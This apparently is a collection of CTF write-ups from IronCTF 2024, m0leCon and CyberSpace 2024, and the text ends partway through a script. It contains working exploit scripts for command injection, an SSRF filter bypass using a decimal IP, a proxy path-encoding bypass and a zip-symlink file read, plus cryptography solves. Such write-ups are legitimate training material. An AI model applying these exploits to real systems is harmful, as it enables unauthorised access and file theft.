#!/usr/bin/python3

import requests
from bs4 import BeautifulSoup

BASE_URL = "https://movie-review.1nf1n1ty.team"
URL_HOOK = ""

ADMIN_USERNAME = 'superadmin'
ADMIN_PASSWORD = 'Sup3rS3cR3TAdminP@ssw0rd$!'

s = requests.Session()

def login():
  r = s.post(BASE_URL + "/servermonitor/admin",data={"username":ADMIN_USERNAME,"password":ADMIN_PASSWORD})
  if r.status_code == 200:
    print("[+] Login Success")
  else:
    print("[!] Login Failed")
    exit(1)

def exploit():
  flag = BeautifulSoup(s.post(BASE_URL + "/servermonitor/admin_panel",data={"ip":"8.8.8.8","count":"1;cat '/flag.txt' #"}).text, 'html.parser').find_all('pre')[0].text
  print("[+] Flag: ",flag)

def main():
  login()
  exploit()


if __name__ == "__main__":
  main()

# goodluck by @akiidjk

The solution is very simple, let's log in to the admin panel and then take advantage of the fact that the count parameter is not sanitized to execute a command of our choice and set the flag

flag: :spoiler[ironCTF{4lways_b3_c4ar3ful_w1th_G1t!}]

IronCTF2024 | b64SiteViewer

Mon, 07 Oct 2024 00:00:00 GMT

Introduction

We are faced with a very simple application in which, given a url, the base64 of the page content is given back to us, plus there is a special endpoint that allows us to execute certain commands

Source

There are two endpoints of interest to us, the first of which is this one, which, as we can see, has several filters, especially those that do not allow us to access the localhost (very strange at first glance, you might think).

# filename: app.py

@app.route('/',methods=['GET','POST'])
def home():
    if request.method=='GET':
        return render_template('home.html')
    if request.method=='POST':
        try:
            url=request.form.get('url')
            scheme=urlparse(url).scheme
            hostname=urlparse(url).hostname
            blacklist_scheme=['file','gopher','php','ftp','dict','data']
            blacklist_hostname=['127.0.0.1','localhost','0.0.0.0','::1','::ffff:127.0.0.1']
            if scheme in blacklist_scheme:
                return render_template_string('blocked scheme')
            if hostname in blacklist_hostname:
                return render_template_string('blocked host')
            t=urllib.request.urlopen(url)
            content = t.read()
            output=base64.b64encode(content)
            return (f'''base64 version of the site:
                {output[:1000]}''')
        except Exception as e:
                print(e)
                return f" An error occurred: {e} - Unable to visit this site, try some other website."

We are blocked from accessing the localhost mainly to prevent us from accessing the admin endpoint, which, as we can clearly see, blocks all IPs that are not 127.0.0.1


@app.route('/admin')
def admin():
    remote_addr = request.remote_addr

    if remote_addr in ['127.0.0.1', 'localhost']:
        cmd=request.args.get('cmd','id')
        cmd_blacklist=['REDACTED']
        if "'" in cmd or '"' in cmd:
            return render_template_string('Command blocked')
        for i in cmd_blacklist:
            if i in cmd:
                return render_template_string('Command blocked')
        print(f"Executing: {cmd}")
        res= subprocess.run(cmd, shell=True, capture_output=True, text=True)
        return res.stdout
    else:
        return render_template_string("Don't hack me")

The admin endpoint also takes as parameter a CMD argument, which is a bash command that will be executed (Having first checked it with a blacklist)

Solution

The goal is to reach /admin and execute a command to get the flag

The solution is divided into two phases

Bypass the filter in /
Bypass the blacklist in /admin (Blacklist we don't know)

Bypass the first filter

In the endpoint, the hostname check is not really done correctly because it takes the hostname but does not check what format it is in or that it is valid etc and just does a very trivial comparison, so we just need to represent the IP with a different number system to bypass the filter.

Bypassing the second filter

The second blacklist is much more complex, in fact initially I had many problems to understand, and especially to understand how to get the flag, as all the commands to access the ENV were blocked, but the solution as usual is much more trivial, in fact to leak the blacklist is enough to make a tail (which fortunately was not blocked) and modify the offsets with the parameters we can read part of the blacklist, Finally to get the flag is actually very simple, in fact using tail on the run. sh we can see which is the file where the environment variable of the flag is created and therefore where we can find the

Final exploit

# filename: exploit.py

#!/usr/bin/python3

import requests
import urllib.parse
import base64

BASE_URL = "https://b64siteviewer.1nf1n1ty.team/"

PAYLOAD_CMD = urllib.parse.quote("tail run???")
URL_HOOK = "http://2130706433:5000/admin?cmd=" + PAYLOAD_CMD # We use 2130706433 instead of 127.0.0.1 because is blocked by the WAF

def send_url(url):
  data = {"url": url}
  response = requests.post(BASE_URL, data=data)
  try:
    return response.text.split("base64 version of the site:")[1].strip()[2:-1], True
  except:
    return response.text, False

def main():
  print("[+] URL: ", URL_HOOK)
  res_base64,status = send_url(URL_HOOK)
  if status:
    print("[+] Result of exploit: ", base64.b64decode(res_base64).decode())
  else:
    print(f"[+] Error in the requests: {res_base64}")


if __name__ == "__main__":
  main()


# goodluck by @akiidjk

flag: :spoiler[ironCTF{y0u4r3r0ck1n6k33ph4ck1n6}"]

IronCTF2024 | Rivest, Shamir, Adleman 1

Sun, 06 Oct 2024 00:00:00 GMT

Introduction

Rivest, Shamir, Adleman 1 was a crypto CTF from IRON CTF 2024 organized by Team 1nf1n1ty.

from Crypto.Util.number import *

m = open("flag.txt",'rb').read()

m = bytes_to_long(m)

p = getPrime(1024)
q = getPrime(1024)
N = p*q

e = getRandomNBitInteger(16)
c = pow(m,e,N)
p_ = p >> (200)

print(f"{(p_,N,e,c)=}")

# (p_,N,e,c)=(78251056776113743922781362749830646373211175353656790171039496888342171662458492506297767981353887690931452440620588460424832375197427124943346919084717792877241717599798699596252163346397300952154047511640741738581061446499402444306089020012841936, 19155750974833741583193175954281590563726157170945198297004159460941099410928572559396586603869227741976115617781677050055003534675899765832064973073604801444516483333718433505641277789211533814981212445466591143787572063072012686620553662750418892611152219385262027111838502078590253300365603090810554529475615741997879081475539139083909537636187870144455396293865731172472266214152364966965486064463013169673277547545796210067912520397619279792527485993120983571116599728179232502586378026362114554073310185828511219212318935521752030577150436386831635283297669979721206705401841108223134880706200280776161816742511, 37929, 18360638515927091408323573987243771860358592808066239563037326262998090628041137663795836701638491309626921654806176147983008835235564144131508890188032718841579547621056841653365205374032922110171259908854680569139265494330638365871014755623899496058107812891247359641915061447326195936351276776429612672651699554362477232678286997748513921174452554559807152644265886002820939933142395032126999791934865013547916035484742277215894738953606577594559190553807625082545082802319669474061085974345302655680800297032801212853412563127910754108599054834023083534207306068106714093193341748990945064417347044638122445194693)

It is a typical rsa challenge where you're given a "leak": some part of the private key which allows you to retrieve it fully. We're given the most significant bits of p and must figure out the rest.

Solution

We'll use Coppersmith's method to find the 200 lowermost bits of p (beta has a default value of 1 which must be tweaked to solve this)

R.<x> = PolynomialRing(Zmod(N))

lsb = (p_*2^200 + x).monic().small_roots(beta=0.4)
p = Integer(p_*2^200 + lsb[0])

assert is_prime(p)

One more trouble to solve is that $gcd(e, \phi) \ne 1$, so we must generate all possible plaintexts corresponding to our ciphertext (source).

q = N // p
phi = (p - 1) * (q - 1)

k = 1
while gcd(e, phi/k) != 1:
    k *= gcd(e, phi/k)

d = inverse_mod(e, phi/k)

roots = [power_mod(a, phi/k, N) for a in range(1, 100)]

g = power_mod(c, d, N)

plaintexts = [r * g % N for r in roots]

This is the full solve script in sagemath.

p_, N, e, c = (78251056776113743922781362749830646373211175353656790171039496888342171662458492506297767981353887690931452440620588460424832375197427124943346919084717792877241717599798699596252163346397300952154047511640741738581061446499402444306089020012841936, 19155750974833741583193175954281590563726157170945198297004159460941099410928572559396586603869227741976115617781677050055003534675899765832064973073604801444516483333718433505641277789211533814981212445466591143787572063072012686620553662750418892611152219385262027111838502078590253300365603090810554529475615741997879081475539139083909537636187870144455396293865731172472266214152364966965486064463013169673277547545796210067912520397619279792527485993120983571116599728179232502586378026362114554073310185828511219212318935521752030577150436386831635283297669979721206705401841108223134880706200280776161816742511, 37929, 18360638515927091408323573987243771860358592808066239563037326262998090628041137663795836701638491309626921654806176147983008835235564144131508890188032718841579547621056841653365205374032922110171259908854680569139265494330638365871014755623899496058107812891247359641915061447326195936351276776429612672651699554362477232678286997748513921174452554559807152644265886002820939933142395032126999791934865013547916035484742277215894738953606577594559190553807625082545082802319669474061085974345302655680800297032801212853412563127910754108599054834023083534207306068106714093193341748990945064417347044638122445194693)

R.<x> = PolynomialRing(Zmod(N))

lsb = (p_*2^200 + x).monic().small_roots(beta=0.4)
p = Integer(p_*2^200 + lsb[0])

assert is_prime(p)

q = N // p
phi = (p - 1) * (q - 1)

k = 1
while gcd(e, phi/k) != 1:
    k *= gcd(e, phi/k)

d = inverse_mod(e, phi/k)

roots = [power_mod(a, phi/k, N) for a in range(1, 100)]

g = power_mod(c, d, N)

plaintexts = [r * g % N for r in roots]

for pt in plaintexts:
    bs = pt.to_bytes(pt.bit_length() // 8 + 1)
    if b'iron' in bs:
        print('flag:', bs.decode())
        break

flag: :spoiler[ironCTF{@Un7_CaN_yoU_53Nd_me_THOS3_3xp@NSIon_5cREws}]

IronCTF2024 | Loan App

Sun, 06 Oct 2024 00:00:00 GMT

Introduction

This is the challenge web with the most solutions, which I must say is very nice, my solution is the unintended but also the most common one, in fact the correct approach would have been to do 'request smuggling', which is a much more complex attack to bypass the proxy, which in this case consists of splitting a request between proxy and backend.

Solve intended: Something like this

Source

We focus on the proxy config

# filename: file.py

global
    log stdout format raw local0
    maxconn 2000
    user root
    group root
    daemon

defaults
    log global
    option httplog
    timeout client 30s
    timeout server 30s
    timeout connect 30s

frontend http_front
    mode http
    bind :80
    acl is_admin path_beg /admin # Miss config
    http-request deny if is_admin # Miss config
    default_backend gunicorn

backend gunicorn
    mode http
    balance roundrobin
    server loanserver loanapp:8000 maxconn 32

And win function

# filename: app.py

@app.route('/admin/loan/<loan_id>', methods=['POST'])
def admin_approve_loan(loan_id):
    try:
        mongo.db.loan.update_one({'_id': ObjectId(loan_id)}, {'$set': {'status': 'approved', 'message': FLAG}})
        return 'OK', 200
    except:
        return 'Internal Server Error', 500

Comments added by me

Solution

The solution is very simple: just read the source code, register and login, and create a loan. Once this is done, thanks to the /admin/loan/id endpoint, the loan is approved by setting the flag

Exploit

# filename: exploit.py

#!/usr/bin/python3

import http
import requests
from uuid import uuid4
from bs4 import BeautifulSoup
import urllib3.util

BASE_URL = "http://loanapp.1nf1n1ty.team/"
s = requests.Session()

def login(username,password):
  r = s.post(BASE_URL + "login", data={"username": username, "password": password})
  if r.status_code == 200:
    print("[+] Login successful")
  else:
    print("[-] Login failed: " + r.text)
    exit(1)

def register(username,password):
  r = s.post(BASE_URL + "register",data={"username": username, "password": password})
  if r.status_code == 200:
    print("[+] Registration successful")
  else:
    print("[-] Registration failed: " + r.text)
    exit(1)


def loan_request():
  r = s.post(BASE_URL + "loan-request", data={"amount": "696969696969696969", "reason": "I need money for cookies"})
  if r.status_code == 200:
    print("[+] Loan request successful")
  else:
    print("[-] Loan request failed: " + r.text)
    exit(1)

def get_loan_id():
  r = s.get(BASE_URL)
  soup = BeautifulSoup(r.text, 'html.parser')
  loan_id = soup.find("span", attrs={"class":"loan-id"}).text.strip().split(": ")[1]
  return loan_id

def exploit(loan_id):
  conn = http.client.HTTPConnection(urllib3.util.parse_url(BASE_URL).host)
  conn.request("POST", f"/%61dmin/loan/{loan_id}") # Use http instead of requests for avoid auto url encoding of requests
  response = conn.getresponse()
  if response.status != 200:
    print("[-] Exploit failed")
    exit(1)

def get_flag():
  r = s.get(BASE_URL)
  soup = BeautifulSoup(r.text, 'html.parser')
  return soup.find("p", attrs={"class": "loan-message"}).text.strip()[7:]

def main():
  username, password = uuid4(), uuid4()
  print(f"Username: {username} Password: {password}")
  register(username,password)
  login(username,password)
  loan_request()
  loan_id = get_loan_id()
  print(f"[+] Loan ID: {loan_id}")
  exploit(loan_id)
  print(f"[+] Flag: {get_flag()}")


if __name__ == "__main__":
  main()

# goodluck by @akiidjk

flag: :spoiler[ironCTF{L04n_4ppr0v3d_f0r_H4ck3r$!!}]

IronCTF2024 | Rivest, Shamir, Adleman 2

Sun, 06 Oct 2024 00:00:00 GMT

Introduction

Rivest, Shamir, Adleman 2 was a crypto CTF from IRON CTF 2024 organized by Team 1nf1n1ty. It is meant as a sequel to Rivest, Shamir, Adleman 1. We're not given a script that generates the parameters, simply the public key and the ciphertext.

(N,e,c)=(161643423646746552081298841935498903406728484661198088824380120820649408462211320026846900530120533720144166059852036274757176945943476154740893002954181911201068843959015760064479587114460816364946604976937998011320067074515344961776920419207973234413389567508538119203696918037349918054399980346807879167361, 36675, 59237480729804419902249350038380812764615310700084519548754724856780737977857097616843794684178008858466821286387353080178404910815575872547979820848851425285654302196414305127926468908308102733135120774714553727434912025225828846601760761868067655959956674559148988221195055343304319184971182998654695411365)

Solution

Since N is prime we can just calculate the e-th roots of c to find the plaintext(s)

N, e, c = (161643423646746552081298841935498903406728484661198088824380120820649408462211320026846900530120533720144166059852036274757176945943476154740893002954181911201068843959015760064479587114460816364946604976937998011320067074515344961776920419207973234413389567508538119203696918037349918054399980346807879167361, 36675, 59237480729804419902249350038380812764615310700084519548754724856780737977857097616843794684178008858466821286387353080178404910815575872547979820848851425285654302196414305127926468908308102733135120774714553727434912025225828846601760761868067655959956674559148988221195055343304319184971182998654695411365)

for m in GF(N)(c).nth_root(e, all=True):
    bs = bytes(Integer(m).digits(256)[::-1])
    if b'iron' in bs:
        print('flag:', bs[:bs.index(b'}')+1].decode())
        break

flag: :spoiler[ironCTF{th15_TIme_You_c4Nt_f!ND_1t_hop3FUl1Y}]

M0lecon2025teaser | Yet Another OT

Sun, 15 Sep 2024 00:00:00 GMT

Disclaimer

I wasn't able to solve this challenge during the competition, but managed to get to the solution after talking on discord to other competitors who very kindly helped me figure it out.

Introduction

Yet Another OT was a crypto CTF from m0leCon 2025 hosted by pwnthem0le.

import random
from hashlib import sha256
import json
import os
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

random = random.SystemRandom()


def jacobi(a, n):
    if n <= 0:
        raise ValueError("'n' must be a positive integer.")
    if n % 2 == 0:
        raise ValueError("'n' must be odd.")
    a %= n
    result = 1
    while a != 0:
        while a % 2 == 0:
            a //= 2
            n_mod_8 = n % 8
            if n_mod_8 in (3, 5):
                result = -result
        a, n = n, a
        if a % 4 == 3 and n % 4 == 3:
            result = -result
        a %= n
    if n == 1:
        return result
    else:
        return 0


def sample(start, N):
    while jacobi(start, N) != 1:
        start += 1
    return start


class Challenge:
    def __init__(self, N):
        assert N > 2**1024
        assert N % 2 != 0
        self.N = N
        self.x = sample(int.from_bytes(sha256(("x"+str(N)).encode()).digest(), "big"), N)
        ts = []
        tts = []
        for _ in range(128):
            t = random.randint(1, self.N)
            ts.append(t)
            tts.append(pow(t, N, N))
        print(json.dumps({"vals": tts}))
        self.key = sha256((",".join(map(str, ts))).encode()).digest()

    def one_round(self):
        z = sample(random.randint(1, self.N), self.N)
        r0 = random.randint(1, self.N)
        r1 = random.randint(1, self.N)

        m0, m1 = random.getrandbits(1), random.getrandbits(1)

        c0 = (r0**2 * (z)**m0) % self.N
        c1 = (r1**2 * (z*self.x)**m1) % self.N

        print(json.dumps({"c0": c0, "c1": c1}))
        data = json.loads(input())
        v0, v1 = data["m0"], data["m1"]
        return v0 == m0 and v1 == m1

    def send_flag(self, flag):
        cipher = AES.new(self.key, AES.MODE_ECB)
        ct = cipher.encrypt(pad(flag.encode(), 16))
        print(ct.hex())


FLAG = os.environ.get("FLAG", "ptm{test}")

def main():
    print("Welcome to my guessing game!")
    N = int(input("Send me a number: "))
    chall = Challenge(N)
    for _ in range(128):
        if not chall.one_round():
            exit(1)
    chall.send_flag(FLAG)


if __name__ == "__main__":
    main()

We can remotely interact with this service to recover the flag.

Analysis

Let's start with the functions: jacobi(a, n) computes the Jacobi symbol of a mod n

sample(start, N) returns the first s >= start such that sample(s, N) == 1

Let's look at the class Challenge now: __init__(self, N)

N is checked to be odd and greater than $2^{1024}$
self.x is generated from sample(int.from_bytes(sha256(("x"+str(N)).encode()).digest(), "big"), N)
A loop generates 128 random private values ts and their public counterpart tts
self.key is generated from sha256((",".join(map(str, ts))).encode()).digest()

one_round(self)

z is generated from sample(random.randint(1, self.N), self.N)
r0, r1 are random integers in the range $[1, N]$
m0, m1 are randomly chosen from ${0, 1}$
$c_0 \equiv r_0^2 \cdot z^{m_0} \pmod N$
$c_1 \equiv r_1^2 \cdot (z \cdot x)^{m_1} \pmod N$
c0, c1 are shared and the user has to correctly guess m0, m1 to continue to the next round

send_flag(self, flag)

encrypts the flag with AES using self.key and sends it to the user

Solution

The first objective is retrieving the AES key, so from each pow(t, N, N) I had to get t. My idea was to use Fermat's little theorem, therefore setting N to be prime would make it so tts == ts. This allows easy recovery of self.key but it's also a grave mistake... The second objective is guessing m0 and m1 128 times in a row to finally get the encrypted flag and decrypt it with our key. The idea is to use theory about quadratic residues, but this is where I got stuck: if N is prime this is actually impossible as sample will always generate a correct quadratic residue and therefore these two cases are indistinguishable

$$ \begin{cases} c_0 \equiv r_0^2 \cdot z \pmod N \ c_0 \equiv r_0^2 \pmod N \end{cases} $$

After the end of the CTF I asked on discord for help on figuring out where I went wrong and some competitors who solved it kindly explained it to me. The idea is to use a different value for N. Recovering the private key requires "decrypting" the public values which are encrypted using the usual RSA method, we expect this to be hard without knowing the factorization of N, but as we're the ones to choose it we can simply generate some primes, take their product and decrypting is easy as we have the factorization of N. Now that N is composite sample won't always generate quadratic residues mod N (there is still a possibility but it's low enough to be ignored) so as soon as the Legendre symbol of c0 for any of the prime factors of N isn't 1 we know we must be in the case where m0 == 1 (same goes for c1and m1). After 128 rounds we are given the encrypted flag which we can just decrypt as we have the key.

from Pwn4Sage.pwn import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import json, hashlib

r = remote('yaot.challs.m0lecon.it', 2844)

primes = [random_prime(2^(32), lbound=2^31) for _ in range(33)]
N = prod(primes)

assert N > 2^1024

phi = prod([p - 1 for p in primes])
d = inverse_mod(N, phi)

# Pwn4Sage doesn't have sendlineafter
r.sendafter(b'number: ', str(N).encode() + b'\n')

tts = json.loads(r.recvline().rstrip())['vals']

ts = [pow(tt, d, N) for tt in tts]

key = hashlib.sha256((",".join(map(str, ts))).encode()).digest()

for _ in range(128):
    data = json.loads(r.recvline().rstrip())

    c0, c1 = data['c0'], data['c1']

    m0 = int(any(legendre_symbol(c0, p) != 1 for p in primes))
    m1 = int(any(legendre_symbol(c1, p) != 1 for p in primes))

    payload = json.dumps({'m0': m0, 'm1': m1}).encode()

    r.sendline(payload)

enc_flag = bytes.fromhex(r.recvline().rstrip().decode())

cipher = AES.new(key, AES.MODE_ECB)

flag = unpad(cipher.decrypt(enc_flag), 16).decode()

print('flag:', flag)

flag: :spoiler[ptm{t0_b3_0r_n07_t0_b3_4_qu4dr471c_r351du3?}]

Cyberspace2024 | Snake

Mon, 02 Sep 2024 00:00:00 GMT

Link to the binary: Elf file

Introduction

We are faced with a binary file written in Rust (you can see it by simply running strings snake | grep rustc) where we are made to play Snake, the goal is to get PRECISELY to 16525 points.

Solution

The solutions were actually different, some people used tools to analyze the memory of a process in real time, I preferred a 'slower' approach, or rather the first thing that came to mind, so I opened binary ninja despite the file being stripped and looked for a value for constant exactly 0xa (i.e. the value that was added every time it ate a #).

In a short time I managed to find this:

After some trial and error, changing the value from 0xa to 0xb, I find the line of code I need, which is the last one in the screenshot above.

At this point I switch to the assembly and notice that my initial approach was wrong this is because I was putting too high a value in a register that it did not support in fact analysing the binary in assembly we see:

As we can see, before entering the constant into the dword register [rcx+0x7c], we first enter it into eax and if we enter too high a value, the programme simply crashes (as it should).

So simply afterwards I chose to put the precise value in the correct register once I had made at least one point

(the nop are automatically inserted by binary ninja)

In this way, once we have scored at least one point, we will have the flag

flag: :spoiler[CSCTF{Y0u_b34T_My_Sl1th3r_G4m3!}]

Cyberspace2024 | Trendy Windy Trigonity

Mon, 02 Sep 2024 00:00:00 GMT

Introduction

trendy windy trigonity was a crypto CTF CyberSpace CTF 2024 added during the second wave.

from Crypto.Util.number import bytes_to_long

flag = REDACTED
print(len(flag))

R = RealField(1000)
a, b = bytes_to_long(flag[:len(flag)//2]), bytes_to_long(flag[len(flag)//2:])
x = R(0.75872961153339387563860550178464795474547887323678173252494265684893323654606628651427151866818730100357590296863274236719073684620030717141521941211167282170567424114270941542016135979438271439047194028943997508126389603529160316379547558098144713802870753946485296790294770557302303874143106908193100)

enc = a*cos(x)+b*sin(x)

# 38
# 2.78332652222000091147933689155414792020338527644698903976732528036823470890155538913578083110732846416012108159157421703264608723649277363079905992717518852564589901390988865009495918051490722972227485851595410047572144567706501150041757189923387228097603575500648300998275877439215112961273516978501e45

The challenge uses sagemath to handle high precision floating point numbers, in this case a RealField with 1000 bits of precision. The idea behind the challenge is very simple: find a and b to retrieve the flag.

Solution

enc is a linear combination of cos(x) and sin(x), you know what that means: lattice. Don't forget to scale by the precision as we are working with integers.

R = RealField(1000)

x = R(0.75872961153339387563860550178464795474547887323678173252494265684893323654606628651427151866818730100357590296863274236719073684620030717141521941211167282170567424114270941542016135979438271439047194028943997508126389603529160316379547558098144713802870753946485296790294770557302303874143106908193100)
enc = R(2.78332652222000091147933689155414792020338527644698903976732528036823470890155538913578083110732846416012108159157421703264608723649277363079905992717518852564589901390988865009495918051490722972227485851595410047572144567706501150041757189923387228097603575500648300998275877439215112961273516978501e45)

scale = 2^1000

m = matrix(ZZ, [
    [1, 0, scale*cos(x)],
    [0, 1, scale*sin(x)],
    [0, 0, -scale*enc],
])

vec = m.LLL()[0]
a, b = vec[0], vec[1]

print(f'flag: {(a.to_bytes(19) + b.to_bytes(19)).decode()}')

flag: :spoiler[CSCTF{Trigo_453_Tr3ndy_FuN_Th35e_D4Y5}]

Cyberspace2024 | ZipZone

Mon, 02 Sep 2024 00:00:00 GMT

Introduction

ZipZone is the only one web in the beginner's category and, as the title suggests, you have to upload zip files that will be unzipped later, so you have to download the extracted files afterwards.

Source

# filename: app.py

import logging
import os
import subprocess
import uuid

from flask import (
    Flask,
    abort,
    flash,
    redirect,
    render_template,
    request,
    send_from_directory,
)

app = Flask(__name__)
upload_dir = "/tmp/"

app.config["MAX_CONTENT_LENGTH"] = 1 * 10**6  # 1 MB
app.config["SECRET_KEY"] = os.urandom(32)


@app.route("/", methods=["GET", "POST"])
def upload():
    if request.method == "GET":
        return render_template("index.html")

    if "file" not in request.files:
        flash("No file part!", "danger")
        return render_template("index.html")

    file = request.files["file"]
    if file.filename.split(".")[-1].lower() != "zip":
        flash("Only zip files allowed are allowed!", "danger")
        return render_template("index.html")

    upload_uuid = str(uuid.uuid4())
    filename = f"{upload_dir}raw/{upload_uuid}.zip"
    file.save(filename)
    subprocess.call(["unzip", filename, "-d", f"{upload_dir}files/{upload_uuid}"])

    print(f"Unzipped {filename} to {upload_dir}files/{upload_uuid}")

    flash(
        f'Your file is at <a href="/files/{upload_uuid}">{upload_uuid}</a>!', "success"
    )
    logging.info(f"User uploaded file {upload_uuid}.")
    return redirect("/")


@app.route("/files/<path:path>")
def files(path):
    try:
        return send_from_directory(upload_dir + "files", path)
    except PermissionError:
        abort(404)


@app.errorhandler(404)
def page_not_found(error):
    return render_template("404.html")


if __name__ == "__main__":
    app.run(debug=True, host="0.0.0.0", port=5000)

Solution

Being actually a web in the beginner category, I initially just gave a quick read to the source code, where in fact no checks are done on the files inside the zipper, but only on the zipper itself, where we see the extension is checked

# filename: exploit.py

#!/usr/bin/python3

import os
import subprocess
import requests
from bs4 import BeautifulSoup

BASE_URL = "https://zipzone-web.challs.csc.tf"
URL_HOOK = ""

def get_uuid(text):
  soup = BeautifulSoup(text, 'html.parser')
  for a in soup.find_all('a', href=True):
    if a['href']:
      return a['href'].split('/')[-1]


def upload_file(file_path):
  with open(file_path, "rb") as f:
    files = {"file": f}
    response = requests.post(BASE_URL, files=files)
    return get_uuid(response.text)


def create_exploit(zip_filename:str,symlink_name:str,symlink_target:str):
    os.symlink(symlink_target, symlink_name)
    subprocess.run(['zip', '-y', zip_filename, symlink_name], check=True)
    print(f'{zip_filename} created.')
    os.remove(symlink_name)

def get_flag(UUID):
  response = requests.get(f'{BASE_URL}/files/{UUID}/evil_link',stream=True)
  if response.status_code == 200:
    with open("flag", 'wb') as f:
      for chunk in response.iter_content(chunk_size=8192):
        f.write(chunk)
    print(f"Flag download successfully")
  else:
      print(f"Error during the download: {response.status_code}")

  return open("flag", "r").read().strip()

def clean():
    os.remove('exploit.zip')
    os.remove('flag')

def main():
  create_exploit(zip_filename='exploit.zip',symlink_name='evil_link',symlink_target='/home/user/flag.txt')
  UUID = upload_file('./exploit.zip')
  print(f'UUID: {UUID}')
  flag = get_flag(UUID)
  print(f"Flag: {flag}")
  clean()

if __name__ == "__main__":
  main()

# goodluck by @akiidjk

The solutions is very simple, A symlink is simply created pointing to /home/user/flag, it is then zipped and sent to the page, we save the file id and in the path uuid/name_file we send the file pointing to the symlink.

flag: :spoiler[CSCTF{5yml1nk5_4r3_w31rd}]

Cyberspace2024 | Feature Unlocked

Mon, 02 Sep 2024 00:00:00 GMT

Introduction

Feature unlocked is part of the first wave of the web and is one of the first challanges I solved. Made by cryptocat, who we salute, it is a fairly simple challange if you read the code correctly.

Source

# filename: main.py

import subprocess
import base64
import json
import time
import requests
import os
from flask import Flask, request, render_template, make_response, redirect, url_for
from Crypto.Hash import SHA256
from Crypto.PublicKey import ECC
from Crypto.Signature import DSS
from itsdangerous import URLSafeTimedSerializer

app = Flask(__name__)
app.secret_key = os.urandom(16)
serializer = URLSafeTimedSerializer(app.secret_key)

DEFAULT_VALIDATION_SERVER = 'http://127.0.0.1:1338'
NEW_FEATURE_RELEASE = int(time.time()) + 7 * 24 * 60 * 60
DEFAULT_PREFERENCES = base64.b64encode(json.dumps({
    'theme': 'light',
    'language': 'en'
}).encode()).decode()


def get_preferences():
    preferences = request.cookies.get('preferences')
    if not preferences:
        response = make_response(render_template(
            'index.html', new_feature=False))
        response.set_cookie('preferences', DEFAULT_PREFERENCES)
        return json.loads(base64.b64decode(DEFAULT_PREFERENCES)), response
    return json.loads(base64.b64decode(preferences)), None


@app.route('/')
def index():
    _, response = get_preferences()
    return response if response else render_template('index.html', new_feature=False)


@app.route('/release')
def release():
    token = request.cookies.get('access_token')
    if token:
        try:
            data = serializer.loads(token)
            if data == 'access_granted':
                return redirect(url_for('feature'))
        except Exception as e:
            print(f"Token validation error: {e}")

    validation_server = DEFAULT_VALIDATION_SERVER
    if request.args.get('debug') == 'true':
        preferences, _ = get_preferences()
        validation_server = preferences.get(
            'validation_server', DEFAULT_VALIDATION_SERVER)

    if validate_server(validation_server):
        response = make_response(render_template(
            'release.html', feature_unlocked=True))
        token = serializer.dumps('access_granted')
        response.set_cookie('access_token', token, httponly=True, secure=True)
        return response

    return render_template('release.html', feature_unlocked=False, release_timestamp=NEW_FEATURE_RELEASE)


@app.route('/feature', methods=['GET', 'POST'])
def feature():
    token = request.cookies.get('access_token')
    if not token:
        return redirect(url_for('index'))

    try:
        data = serializer.loads(token)
        if data != 'access_granted':
            return redirect(url_for('index'))

        if request.method == 'POST':
            to_process = request.form.get('text')
            try:
                word_count = f"echo {to_process} | wc -w"
                output = subprocess.check_output(
                    word_count, shell=True, text=True)
            except subprocess.CalledProcessError as e:
                output = f"Error: {e}"
            return render_template('feature.html', output=output)

        return render_template('feature.html')
    except Exception as e:
        print(f"Error: {e}")
        return redirect(url_for('index'))


def get_pubkey(validation_server):
    try:
        response = requests.get(f"{validation_server}/pubkey")
        response.raise_for_status()
        return ECC.import_key(response.text)
    except requests.RequestException as e:
        raise Exception(
            f"Error connecting to validation server for public key: {e}")


def validate_access(validation_server):
    pubkey = get_pubkey(validation_server)
    try:
        response = requests.get(validation_server)
        response.raise_for_status()
        data = response.json()
        date = data['date'].encode('utf-8')
        signature = bytes.fromhex(data['signature'])
        verifier = DSS.new(pubkey, 'fips-186-3')
        verifier.verify(SHA256.new(date), signature)
        return int(date)
    except requests.RequestException as e:
        raise Exception(f"Error validating access: {e}")


def validate_server(validation_server):
    try:
        date = validate_access(validation_server)
        return date >= NEW_FEATURE_RELEASE
    except Exception as e:
        print(f"Error: {e}")
    return False


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=1337)

# filename: validation.py

from flask import Flask, jsonify
import time
from Crypto.Hash import SHA256
from Crypto.PublicKey import ECC
from Crypto.Signature import DSS

app = Flask(__name__)

key = ECC.generate(curve='p256')
pubkey = key.public_key().export_key(format='PEM')


@app.route('/pubkey', methods=['GET'])
def get_pubkey():
    return pubkey, 200, {'Content-Type': 'text/plain; charset=utf-8'}


@app.route('/', methods=['GET'])
def index():
    date = str(int(time.time()))
    h = SHA256.new(date.encode('utf-8'))
    signature = DSS.new(key, 'fips-186-3').sign(h)

    return jsonify({
        'date': date,
        'signature': signature.hex()
    })


if __name__ == '__main__':
    app.run(host='127.0.0.1', port=1338)

The application is divided into two parts: the main one, where we find the web application, and a server used to validate the access token with the access_garantied parameter for the release of the feature.

One thing that immediately stands out is a part of the main code where a debug mode is given.

if request.args.get('debug') == 'true':
  preferences, _ = get_preferences()
  validation_server = preferences.get(
  'validation_server', DEFAULT_VALIDATION_SERVER)

If the get arguments have the debug=true option, it will take the validation server from our preferences, which we remember to be a simple base64 cookie from a json so easily replicable.

Solution

What we can do is give the application its own validation server, which is simply a copy of our own, except that we can change the date of the server to make the feature.

# filename: evil_validation.py


from flask import Flask, jsonify
import time
from Crypto.Hash import SHA256
from Crypto.PublicKey import ECC
from Crypto.Signature import DSS

app = Flask(__name__)

key = ECC.generate(curve='p256')
pubkey = key.public_key().export_key(format='PEM')


@app.route('/pubkey', methods=['GET'])
def get_pubkey():
    print("Pubkey: " + pubkey)
    return pubkey, 200, {'Content-Type': 'text/plain; charset=utf-8'}


@app.route('/', methods=['GET'])
def index():
    date = str(int(time.time()) + 7 * 24 * 60 * 60)
    h = SHA256.new(date.encode('utf-8'))
    signature = DSS.new(key, 'fips-186-3').sign(h)

    print("Date: " + date)
    print("Signature: " + signature.hex())
    print("Validating signature...")

    print(jsonify({
        'date': date,
        'signature': signature.hex()
    }))

    return jsonify({
        'date': date,
        'signature': signature.hex()
    })


if __name__ == '__main__':
    app.run(host='127.0.0.1', port=1338)

# filename: exploit.py

#!/usr/bin/python3

import base64
import requests
import json
from bs4 import BeautifulSoup

BASE_URL = "https://feature-unlocked-web-challs.csc.tf"
